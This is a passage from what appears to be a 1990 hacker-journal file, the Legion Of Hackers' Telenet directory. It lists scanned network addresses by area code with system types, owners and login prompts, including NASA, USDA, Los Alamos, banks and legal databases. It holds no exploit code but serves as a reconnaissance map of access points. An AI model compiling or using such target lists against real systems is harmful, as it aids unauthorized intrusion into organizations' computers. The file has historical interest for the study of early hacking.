*  341 
*  354 
   370                    PEOPLE/LINK 
   373a 
   374                    Information Resources 
   375     VAX            Marketing Fact Book 
   378                    Baxter ASAP System 
*  391 
*  392 
*  394 
*  395 
*  397 
$  398                    MHP201A 
   400                    Baxter ASAP System 
   401                            " 
   402                            " 
   403                            " 
   404                            " 
   406                    COMMAND UNRECOGNIZED 
$  410                    PC Pursuit Dialer (300) 
$  411                    PC Pursuit Dialer (1200) 
*  420 
*  421 
$  422                    MHP201A 
*  425 
*  427 
*  428 
*  431 
$  434                    Purdue ISN 
$  435     HP-3000 
$  439                    Purdue ISN 
*  442 
*  469 
*  475 
*  476 
*  477 
   520                    R59X01 login: 
   521                          " 
   522                          " 
   523                          " 
   524                          " 
   525                          " 
   526                    PASSWORD 
   527                    PASSWORD 
   528                    PASSWORD 
   532     VAX            OMNI 
   534 
   535 
   536 
   548 
$  571 
$  572 
$  575 
$  576 
$  577 
$  580 
$  581 
$  590 
$  591 
$  592 
$  593 
$  594 
$  595 
$  596 
$  597 
   583 
   584 
   586 
   587 
   588 
   589 
   655                    Baxter ASAP System 
   740                    Telenet Async to 3270 
   741a                   Telenet Async to 3270 
*  759 
*  761 
*  762 
*  763 
*  764 
*  766 
*  767 
*  768 
*  769 
$  770                    Telenet Async to 3270 
$  771a                   Telenet Async to 3270 
$  772                    Telenet Async to 3270 
   1030    VAX            First Options of Chicago 
   1031    VAX                      " 
   1032    VAX                      " 
   1033    VAX                      " 
   1034    VAX                      " 
   1035    VAX                      " 
   1036    VAX                      " 
   1037    VAX                      " 
   1038    VAX                      " 
   1112 
   1127 
   1130                   R52XO1 login: 
   1131                        " 
   1132                        " 
   1133                        " 
   1134                        " 
   1135                        " 
   1136                        " 
   1137                        " 
   1138                        " 
   1139                        " 
   1140                        " 
   1141                        " 
   1142                        " 
   1143                        " 
   1144                        " 
 
 
313--MICHIGAN--ADDRESSES SCANNED:  0-400 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  24                     PC Pursuit Dialer (2400) 
   25                     COMSHARE 
$  30      VAX            GVN VAX CLUSTER 
   37                     enter system id-- 
   38                           " 
   40                     Autonet 
   41                     Autonet 
   43                     enter system id-- 
   50                     enter system id-- 
   61                     enter system id-- 
   62                     merit:x.25 
   64                     Telenet Async to 3270 
   65a                    Telenet Async to 3270 
   68                     (I)nternational (D)atapac 
*  75 
$  77                     ID 
   82                     NTUSSTB5 
   83                        " 
   85                     enteer system id-- 
   119                    PASSWORD 
   120                       " 
   145                    enter your access code? 
   146                              " 
   148                    ENTER YOUR SUBSCRIBERID; 
   160                    PASSWORD 
   161                       " 
   162                       " 
   164                    VU/TEXT 
   165                    enter user ID 
   172                         " 
   173     VAX            IPP 
   202                    merit:x.25 
   210a 
$  214                    PC Pursuit Dialer (300) 
$  216                    PC Pursuit Dialer (1200) 
*  231 
   233 
   239     UNIX           GTE 
*  245 
   249 
   250     HP-3000 
   252 
   255                    $$50 DEVICE TYPE ID 
   256                            " 
*  257 
   346                    ?1040 
   347                      " 
 
 
314--MISSOURI--ADDRESSES SCANNED:  0-300 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  5                      PC Pursuit Dialer (2400) 
$  20                     PC Pursuit Dialer (1200) 
$  33      AOS 
$  35      AOS 
$  36      AOS 
$  37      AOS 
$  38      AOS 
*  39 
$  40      AOS 
$  45      AOS 
*  50 
*  57 
   131                    MDCIS 
   132                    Type User Name 
$  157     PRIME          JEFCTY 
$  179                    ID 
*  240 
*  241 
*  242 
*  243 
*  244 
*  245 
*  246 
*  247 
*  248 
*  249 
*  250 
*  251 
*  252 
*  253 
 
 
315--NEW YORK--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   20                     enter system id 
$  32                     COMMAND UNRECOGNIZED 
$  50                     enter terminal type 
$  130                    ID 
   134                    enter system id 
   135                           " 
   136                           " 
$  137                    GTE CAMILLUS NY 
$  149                    GTE CAMILLUS NY 
   150                    GTE CAMILLUS NY 
   151                           " 
   154 
   155 
   156                    5294 Controller 
   157a                   5294 Controller 
 
 
317--INDIANA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30                     ID 
*  31 
   32                     PRC ACF/VTAM 
   34                     PRC ACF/VTAM 
   41 
 
 
318--LOUISIANA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
*  57 
 
 
321--SPAN--ADDRESSES SCANNED:  VARIOUS 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   104                    NASA Packet Network 
   150     PRIME 
$  160     VAX            NASA/MFSC 
   1030    VAX            MIPS10 
   1036    VAX            US GOVERNMENT VAX 
   1056    PRIME 
   2023    PRIME 
   3035    VAX            FLYBOY 
   4027a                  ALPHA 5 
*  7034 
   7036                   LUT 3.2> 
$  7055    VAX 
   7064    PRIME 
 
 
334--UNKNOWN--ADDRESSES SCANNED:  VARIOUS 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  100                    National Computer Center 
$  102                                " 
$  103                    Enter Terminal id? 
$  130                    NARDAC 
$  131                    NARDAC 
*  200 
$  500 
*  560 
 
 
335--UNKNOWN--ADDRESSES SCANNED:  VARIOUS 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  12 
*  13 
*  110 
*  111 
*  120 
*  121 
*  122 
*  123 
*  124 
*  210 
 
 
336--UNKNOWN--ADDRESSES SCANNED:  0-700 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  21      VAX            USDA 
$  22      VAX             " 
$  40      AOS 
   159     VAX 
$  165     VAX            VSFCA 
   173                    Unisys Telcom 
   174                         " 
   179                         " 
*  180 
$  181 
$  182                    FCCC 
*  183 
$  185                    IVeASID@CVTTAUD@bhUeAg 
$  200     AOS 
$  240     PRIME 
$  250     AOS 
$  260     AOS 
*  604 
 
 
337--UNKNOWN--ADDRESSES SCANNED:  VARIOUS 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  10a 
$  15a 
*  100 
*  101 
$  110                    V28048DA 
$  120     AOS 
*  200 
*  201 
*  202 
*  203 
 
 
343--BURROUGHS--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   190                    BURROUGHS 
 
 
401--RHODE ISLAND--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  42                     ID 
*  50 
   612                    Modem City 
 
 
402--NEBRASKA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   40                     ID 
*  52 
   55                     Dynix 
*  56 
$  60 
   64a 
 
 
404--GEORGIA--ADDRESSES SCANNED:  0-300 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  22                     PC Pursuit Dialer (2400) 
*  33 
$  36      AOS 
$  37      AOS 
*  40 
*  47 
$  72                     ID 
$  113                    PC Pursuit Dialer (300) 
$  114                    PC Pursuit Dialer (1200) 
$  124 
*  127 
$  128 
$  130 
*  136 
*  175 
*  230 
 
 
405--OKLAHOMA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   19 
$  20 
*  32 
*  33 
   34 
   45                     Hertz 
   46                     C@ 
 
 
406--MONTANA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  32      AOS 
$  33      AOS 
$  37      AOS 
$  44      AOS 
$  45      AOS 
$  46      AOS 
$  47      AOS 
$  48      AOS 
$  51      AOS 
$  52      AOS 
$  53      AOS 
$  58      AOS 
$  61      AOS 
$  62      AOS 
$  63      AOS 
$  64      AOS 
$  65      AOS 
$  75      AOS 
*  125 
$  131     AOS 
$  132     AOS 
$  133     AOS 
*  140 
*  142 
*  145 
*  148 
$  150     AOS 
$  155     AOS 
$  157     AOS 
$  158     AOS 
$  159     AOS 
$  161     AOS 
$  162     AOS 
$  163     AOS 
$  176     AOS 
$  178     AOS 
 
 
408--CALIFORNIA--ADDRESSES SCANNED:  0-700 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  21                     PC Pursuit Dialer (2400) 
$  38      AOS 
$  41      AOS 
*  49 
*  53 
   58a 
   62                     TACL1> 
*  76 
   84a 
$  110                    PC Pursuit Dialer (300) 
$  111                    PC Pursuit Dialer (1200) 
   121     HP-3000 
   126a 
$  133     UNIX 
$  135                    SCS-SALES 
*  149 
   154     PRIME          GREGOR 
$  159     VAX 
$  174     AOS 
*  175 
   235                    Global Weather MU2 
   238     UNIX 
$  257     VAX            MATRA DESIGN 
*  260 
*  261 
   264                    Portal 
*  267 
*  268 
*  271 
   274                    BBB Version 20 
   280a 
   304                    Call: 
   311                    AMDAHL Network 
   312                    CCC110A 
   313                    AMDAHL Network 
   314                         " 
   315                         " 
$  342     UNIX 
$  344     VAX            ANDO 
   346     UNIX 
$  349                    PCI (Tymnet clone) 
   352 
$  357                    PCI (Tymnet clone) 
$  358                            " 
$  359                            " 
*  371 
$  375                    PCI (Tymnet clone) 
$  376                            " 
$  377                            " 
   378     UNIX           Sunlink 
   434                    COMMAND UNRECOGNIZED 
   435 
$  439                    PCI (Tymnet clone) 
$  440                            " 
$  444     HP-3000 
$  445     VAX            LAUREL 
$  457     HP-3000 
$  461     AOS 
$  462     AOS 
$  463     AOS 
*  468 
$  469     AOS 
*  479 
*  530 
*  531 
*  532 
$  534     HP-3000 
$  537     HP-3000 
$  538     HP-3000 
*  560 
$  561     AOS 
*  562 
*  563 
*  564 
*  565 
*  566 
*  567 
$  568     AOS 
$  569     AOS 
*  570 
*  571 
*  572 
*  573 
*  574 
$  610     HP-3000 
   619     HP-3000 
*  620 
   627                    Fujitsu America 
 
 
410--RCA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   0                      RCA 
 
 
412--PENNSYLVANIA--ADDRESSES SCANNED:  0-800 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   33                     Enter Usercode: 
$  34                     LORD Corporation 
$  35a                    Telenet Async to 3270 
   42                     Federated Edge 
   43                           " 
   47                     Enter Logon 
   48                          " 
   49                          " 
   51                          " 
   52                          " 
   55                     COMMAND UNRECOGNIZED 
   61 
   63 
   67                     enter terminal id 
*  68 
   79                     Federated Edge 
   117     VAX 
*  122 
   276                    COMMAND UNRECOGNIZED 
   277                            " 
   278                            " 
   279                            " 
*  331 
   340                    Mellon Bank 
   341                    C@ 
   342                    COMMAND UNRECOGNIZED 
   349                    *** ENTER LOGON 
   352                            " 
   354     VAX 
   355                    C@ 
   360     VAX 
   430 
   431 
   671                    Carnegie-Mellon MICOM-B 
 
 
413--MASSACHUSETTS--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  21                     TW81 
 
 
414--WISCONSIN--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  20                     PC Pursuit Dialer (300) 
$  21                     PC Pursuit Dialer (1200) 
$  31      AOS 
$  34      AOS 
$  36      AOS 
*  38 
$  46      PRIME          SYSU 
   49                     MMISC 
   60                     MGIC 
   81a 
*  120 
$  131     AOS 
$  132     AOS 
$  134     AOS 
$  136     AOS 
$  137     AOS 
*  151 
   153 
   189a 
 
 
415--CALIFORNIA--ADDRESSES SCANNED:  0-1300 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  5                      PC Pursuit Dialer (2400) 
   7       HP-3000 
$  11                     PC Pursuit Dialer (1200) 
   20                     Dialog 
   27                     Stanford Data Center 
   29                     Stnaford U. Hospital 
$  34      AOS 
   38      HP-3000 
*  39 
$  45      PRIME          CESSF 
   48                     Dialog 
   49                        " 
   53      VAX 
$  106                    Telenet Async to 3270 
$  108                    PC Pursuit Dialer (300) 
$  109                    PC Pursuit Dialer (1200) 
$  130     AOS 
*  138 
*  139 
*  142 
*  143 
*  144 
*  145 
$  157     VAX            MENLO 
   158                    ComMail  Esprit de Corp 
$  164     AOS 
   167     PRIME          VESTEK 
*  174 
*  178 
$  215                    PC Pursuit Dialer (300) 
$  216                    PC Pursuit Dialer (1200) 
$  217                    PC Pursuit Dialer (2400) 
$  224                    PC Pursuit Dialer (2400) 
   238                    GEONET 
   239                    Telenet Async to 3270 
   242     VAX 
*  252 
   269                    LUT Rel 3.2> 
$  333     AOS 
$  335     AOS 
   338                    Telenet Async to 3270 
   342                    Dialog 
   343                    Telenet Async to 3270 
   345                    SBE Inc. 
*  348 
*  370 
   379     VAX 
$  431     AOS 
$  434     AOS 
$  436     AOS 
$  437     AOS 
$  438     AOS 
   452                    Telmar Intl Network 
*  460 
*  468 
$  470 
$  471 
$  541     AOS 
$  542     AOS 
$  543     AOS 
$  544     AOS 
$  545     AOS 
*  546 
$  547     AOS 
$  549     AOS 
*  551 
*  560 
*  571 
   572     VAX 
   575     VAX            SPRINT 
   576 
   578 
   672                    Telenet Async to 3270 
   698 
$  730     AOS 
$  731     AOS 
$  732     AOS 
$  733     AOS 
*  734 
*  735 
*  736 
*  737 
*  738 
*  739 
*  740 
*  741 
   780 
   827 
   1030    PRIME 
   1036                   OVL 111 44 IDLE 
   1037 
   1038 
   1055 
   1063 
   1200                   enter switch characters 
   1201                             " 
   1202                             " 
   1205                             " 
 
 
419--OHIO--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  35 
 
 
422--WESTINGHOUSE--ADDRESSES SCANNED:  0-1125 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   1       PRIME 
   2 
   102                    ARDM1 
   104     HP-3000 
   106     GS/1 
   114                    west pgh tcc 
   115                    corp info service 
   121     AOS 
   126                    tcc1 
   127                    csc2 
   130     PRIME 
   132     UNIX 
   135     UNIX 
   140 
   141     VAX 
   180                    MHP1201I 
   182                       " 
   183                       " 
   185                       " 
   187                       " 
   194                    Commtex CX-80 
   221 
   222     HP-3000 
   223     VAX 
   229 
 
 
424--UNKNOWN--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   100 
   101 
   102 
   103 
   104 
   114 
   115 
   116 
   122 
   123 
   129 
   130 
 
============================================================================== 
 
               End of First Half of LOD/H Telenet Directory, Rev. #5 
============================================================================== 
The LOD/H Technical Journal, Issue #4: File #09 of 10 
 
                       The Legion Of Hackers Present: 
                       Updated:  Telenet Directory 
                       Part B: Addresses 501XXX to 919XXX 
                       Revision #5 Last Updated: 2/10/90 
                       (Includes Mnemonic Host Names) 
 
                           Scanned and Written by: 
                                Erik Bloodaxe 
 
 
501--ARKANSAS--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
$  31      AOS 
*  32 
*  38 
$  44      PRIME          LROCK 
 
 
502--KENTUCKY--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  50 
*  58 
*  60 
*  61 
 
 
503--OREGON--ADDRESSES SCANNED:  0-1000 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  20                     PC Pursuit Dialer (300) 
$  21                     PC Pursuit Dialer (1200) 
$  30      AOS 
$  31      AOS 
$  32 
$  36      AOS 
$  37      AOS 
$  39      AOS 
$  40      AOS 
*  41 
$  45      AOS 
$  46      AOS 
$  47      AOS 
$  48      AOS 
$  49      AOS 
$  52      AOS 
$  56      AOS 
$  60      AOS 
$  63      AOS 
$  68      AOS 
$  71      AOS 
   75                     PLEASE SIGN ON 
$  76      AOS 
$  77      AOS 
$  78      AOS 
   120 
$  130     AOS 
$  132     AOS 
$  134     AOS 
$  136     AOS 
$  137     AOS 
$  138     AOS 
$  141     AOS 
$  142     AOS 
*  143 
$  147     AOS 
$  149     AOS 
$  150                    TEKTRONIX 100 
$  151     AOS 
$  152     AOS 
$  154     AOS 
$  156     AOS 
*  162 
$  167     AOS 
$  168     AOS 
$  169     AOS 
$  170     AOS 
$  174     AOS 
$  177     AOS 
$  200     AOS 
*  228 
*  229 
$  230     AOS 
*  232 
*  237 
$  238     AOS 
$  239     AOS 
*  240 
$  241     AOS 
$  242     AOS 
$  243                    ID 
$  250     AOS 
$  255     AOS 
$  274     AOS 
$  277     AOS 
$  278     AOS 
$  279     AOS 
$  330     AOS 
$  331     AOS 
$  332     AOS 
$  334     AOS 
$  335     AOS 
$  336     AOS 
$  338     AOS 
$  339     AOS 
$  340     AOS 
$  341     AOS 
$  342     AOS 
$  345     AOS 
$  349     AOS 
$  350     AOS 
$  351     AOS 
$  353     AOS 
$  355     AOS 
$  357     AOS 
$  360     AOS 
$  370     AOS 
$  371     AOS 
$  432     AOS 
$  440     AOS 
   613     UNIX           sequent 
 
 
504--LOUISIANA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  22 
$  31                     ID 
$  32      AOS 
$  33      AOS 
$  34      AOS 
*  38 
*  44 
*  116 
*  117 
$  140     AOS 
*  141 
*  142 
 
 
505--NEW MEXICO--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
$  31                     ID 
$  33      AOS 
*  34 
$  36      AOS 
$  40      AOS 
*  45 
$  46      AOS 
$  51      AOS 
$  52      AOS 
$  53      AOS 
$  56      AOS 
$  57      AOS 
$  60                     ICN Username: 
$  61                     Los Alamos 
$  70      AOS 
$  72      AOS 
$  74      AOS 
$  75      AOS 
$  77      AOS 
$  78      AOS 
$  132     AOS 
$  133     AOS 
*  134 
$  136     AOS 
$  137     AOS 
$  139     AOS 
$  144 
$  150 
 
 
509--WASHINGTON--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  25      AOS 
$  26      AOS 
$  31      AOS 
$  32                     ID 
*  33 
$  48      AOS 
$  50      AOS 
$  73      AOS 
$  79      AOS 
*  130 
*  140 
*  145 
 
 
511--UNKNOWN--ADDRESSES SCANNED:  0-250 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   87 
 
 
512--TEXAS--ADDRESSES SCANNED:  0-300 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  5 
$  33      PRIME          BROWNS 
$  34      PRIME          AUSTIN 
   40 
*  55 
*  62 
*  63 
*  64 
*  65 
   136 
*  139 
   142     VAX            Gould Inc. 
$  242                    Primefax Info Service 
 
 
513--OHIO--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   30                     LEXIS/NEXIS 
   31                     Meadnet 
*  32 
$  33      PRIME          D01 
$  34      VAX 
$  37      PRIME          E03 
$  55      PRIME          I01 
$  57      PRIME          E04 
   59                     Develnet 
$  65      VAX 
*  66 
$  67      PRIME          E09 
$  68      PRIME          X01 
*  69 
$  72      PRIME          O1 
*  73 
$  74      PRIME          W01 
*  75 
$  77      PRIME          M01 
$  78      PRIME          A02 
$  79      PRIME          C2 
$  80                     JETNET EVENDALE 
   131                    LEXIS/NEXIS 
   132                         " 
   133                         " 
   134                         " 
*  140 
   143     VAX 
*  144 
*  158 
 
 
515--IOWA--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   30                     LEXIS/NEXIS 
   31                          " 
$  39      PRIME          NVSL 
$  40                     ID 
*  41 
*  42 
$  43      PRIME          DESMOM 
   131                    LEXIS/NEXIS 
 
 
516--NEW YORK--ADDRESSES SCANNED:  0-700 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   30      VAX            OFFICE 
   35                     CCI MULTILINK 
*  38 
$  41      VAX 
   45      VM/370 
   47 
   48a                    Customer id: 
   49a                        " 
   50a                        " 
*  140 
$  141                    # CONNECT REQUESTED 
   157 
$  232     HP-3000 
   600     PRIME 
*  601 
   610     PRIME          P550 
   617                    Pi-Net 
   618                    Pi-Net 
   625     VAX 
   655 
 
 
517--MICHIGAN--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  40 
$  42      AOS 
 
 
518--NEW YORK--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   30                     USSMSG2 
   31                        " 
   35                        " 
   36                        " 
   37                        " 
 
 
601--MISSISSIPPI--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
$  31                     ID 
$  33      PRIME          GLFPRT 
*  36 
*  37 
*  40 
 
 
602--ARIZONA--ADDRESSES SCANNED:  0-1000 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  22                     PC Pursuit Dialer (300) 
$  23                     PC Pursuit Dialer (1200) 
$  26                     PC Pursuit Dialer (2400) 
*  30 
*  32 
$  33      AOS 
$  34      AOS 
$  35                     GTE COMMUNICATION SYSTEMS 
$  53a     CYBER 
*  55 
$  56      AOS 
$  57      AOS 
$  58      AOS 
$  61      AOS 
$  62                     ID 
$  65      AOS 
*  66 
$  67      AOS 
$  100     AOS 
*  131 
*  133 
   141a 
   142 
$  242     AOS 
$  344     VAX            BUSTOP 
*  349 
*  350 
*  351 
*  352 
*  353 
*  354 
*  355 
*  356 
*  357 
*  358 
*  359 
*  360 
*  361 
   603 
$  630                    > 
 
 
603--NEW HAMPSHIRE--ADDRESSES SCANNED:  0-700 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  20                     Dartmouth College 
$  30      AOS 
*  33 
$  36                     ID 
$  37 
$  40 
   46                     USER NUMBER-- 
   51                     CHUBBS online 
   53                     CHUBBS online 
$  57                     ID 
*  58 
   66                     USER NUMBER-- 
   135     VM/370 
   136     VM/370 
*  137 
   603     VAX 
 
 
606--KENTUCKY--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
$  31                     ID 
$  37      AOS 
   44      HP-3000 
 
 
607--NEW YORK--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
*  30 
*  32 
   44                     enter system id 
   45                           " 
   70      PRIME          FDC99 
*  131 
*  136 
 
 
608--WISCONSIN--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
   35                     enter logon command 
$  140                    ID 
*  141 
 
 
609--NEW JERSEY--ADDRESSES SCANNED:  0-300 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  23                     enter class 
$  26                     UNSUPPORTED FUNCTION 
   42                     Dow Jones 
   46                     Dow Jones 
$  47      HP-3000 
$  61                     UC 
$  63                     UC 
$  68                     UC 
$  73 
   100     PRIME 
   124 
$  125     HP-3000 
$  126                    UC 
$  132     PRIME          MOORES 
$  136                    Twain Terminal Server 
   138     PRIME          HCIONE 
$  141                    UNSUPPORTED FUNCTION 
$  145                    ID 
   170     PRIME 
*  171 
$  172                    UC 
   232a                   MHP2021 APPLICATION: 
   242                    Dow Jones 
   243                    Dow Jones 
   244                    Dow Jones 
 
 
611--UNKNOWN--ADDRESSES SCANNED:  0-400 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   25                     TRANSEND 
   26                         " 
   27                         " 
   28                         " 
   39                     CCF Development System 
   56                     CCF Computing Facility 
   60                     Nexnet 
   120     VAX 
   130     TOPS-20        F.A.S.T. 
   145                    Good Evening,Please Logon: 
   150     PRIME          MHT850 
   192     PRIME 
   193     PRIME 
   194     PRIME 
   195     PRIME 
   196     PRIME          LDN 
   198     PRIME          DEV2 
   234 
   235                    MHCOMET 
   236                       " 
   237                       " 
   238                       " 
 
 
612--MINNESOTA--ADDRESSES SCANNED:  0-500 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   21a 
$  22                     PC Pursuit Dialer (2400) 
   23                     WESTLAW 
$  33                     ID 
   34                     WESTLAW 
   36 
   37                     WESTLAW 
$  44      AOS 
$  46                     CDCNET 
$  52      PRIME 
*  53 
   56                     WESTLAW 
   57                        " 
$  69                     ID 
$  70      AOS 
*  71 
$  120                    PC Pursuit Dialer (300) 
$  121                    PC Pursuit Dialer (1200) 
$  131                    ID 
*  132 
*  138 
$  139     VAX 
$  162     PRIME          PIERRE 
*  231 
*  232 
*  233     AOS 
   236 
   240                    MSC X.25 Gateway 
*  251 
*  252 
$  260                    CDCNET 
   270                    WESTLAW 
   271                       " 
*  332 
*  333 
$  340     AOS 
$  351     AOS 
   356                    WESTLAW 
   357                       " 
   358                       " 
   359                       " 
   362                       " 
   363                       " 
   364                       " 
   365                       " 
   366                       " 
   367                       " 
   369                       " 
   385 
   391                    WESTLAW 
   393                       " 
*  430 
   442                    please LOGIN 
 
 
614--OHIO--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30                     ID 
*  36 
*  130 
$  131     AOS 
*  132 
 
 
615--TENNESSEE--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
$  31                     ID 
$  32 
$  33      PRIME          FRKFRT 
$  34      AOS 
*  36 
*  50 
*  55 
   139a                   Telenet Async to 3270 
 
 
616--MICHIGAN--ADDRESSES SCANNED:  0-200 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
$  30      AOS 
   45      VAX            ACTEST 
$  50 
$  51 
   58                     MHP201A 
   63                     Meridian 
 
 
617--MASSACHUSETTS--ADDRESSES SCANNED:  0-1100 
 
$  ADDR    SYSTEM TYPE    OWNER/SYSTEM NAME/RESPONSE 
---------------------------------------------------- 
   20      PRIME          PBN27 
   22      PRIME          BDSD 
*  26 
*  29 
$  30      GS/1 
   37      PRIME          BDSH 
   46      PRIME          BDSS 
$  47                     ENTER ACCESS PASSWORD: 
   48      VAX 
*  51 
$  56 
*  61a 
$  64      PRIME          OPS 
   67      PRIME          IRI System 1 
   72      PRIME          IRI System 2 
   74      PRIME          ENB 
*  78 
*  114 
*  115 
   143     IDC/370 
   147     HP-3000 
   152                    ENTER LOGON 
*  153 
   158     PRIME          BDSW 
   164 
   169 
   201 
   205     AOS            MONARCH 
   206 
   226     VM/370 
*  230 
   236     VAX            Thompson Financial Network 
   237     UNIX           b1cs4 
   249     Decserver 
   250                    NDNA 
   255     PRIME          PBN43 
   256                    MGS Teaching Program 
*  266 
   270     VAX            SNOOPY 
   273                    enter system id 
*  274 
   291 
$  311                    PC Pursuit Dialer (300) 
$  313                    PC Pursuit Dialer (1200) 
   330     VAX 
*  336 
$  341     VAX 
$  347     HP-3000 
   349 
   350     PRIME          PBN39 
   351     PRIME          BDSU 
   352     PRIME          OASB 
   354     VAX            Anchor Comm. Router 
   359     VAX            HEWEY 
*  371 
*  372 
   379                    $$ 4200 MODEL: 
   380     PRIME          L01 
   381     PRIME          P01 
   382     PRIME          Y01 
   383     PRIME          H02 
   387     PRIME          B01 
   388                    $$ 4200 MODEL: 
   391     PRIME          P01 
   393     PRIME          Y04 
   398     PRIME          V03 
   437     HP-3000 
   443     IDC/370 
   446     PRIME          ENO 
   447     PRIME          ENL 
   451 
   452     PRIME          NET 
   454     PRIME          NORTON 
   457     PRIME          NNEB 
   476     PRIME          NNEB 
*  460 
*  465 
